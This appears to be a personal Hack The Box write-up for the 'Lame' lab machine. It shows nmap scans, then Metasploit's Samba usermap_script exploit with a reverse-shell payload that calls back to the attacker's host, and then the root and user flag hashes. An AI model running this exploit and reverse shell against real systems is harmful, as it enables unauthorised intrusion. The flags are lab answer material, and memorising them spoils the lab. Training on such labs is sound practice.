VM 2 - LAME 

nmap -sC -sV -oA lame 10.10.10.3

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h31m42s, deviation: 3h32m09s, median: 1m41s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-11-15T02:35:19-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

root@kali:/# nmap -p 6200 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-15 02:39 EST
Nmap scan report for 10.10.10.3
Host is up (0.18s latency).

PORT     STATE    SERVICE
6200/tcp filtered lm-x

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds


sudo msfdb init && msfconsole

msf5 > use exploit/multi/samba/usermap_script

msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3

msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.3:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo JxcpITjRbP2rlp33;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "JxcpITjRbP2rlp33\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:54964) at 2020-11-15 02:51:36 -0500
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log


cat root.txt : command not found
5d8232d70d3684096a4b10eac7d9b0fe
^[[A^[[A^[[A
sh: line 16: 


cd /root/Des : command not found
sh: line 22: cd: /root/Des: No such file or directory
^[[A^[[A^[[A
sh: line 23: 

cd /root/Desktop
ls

cat /home/makis/user.txt
40e51bd05133d5639a7cb8e6b378b735



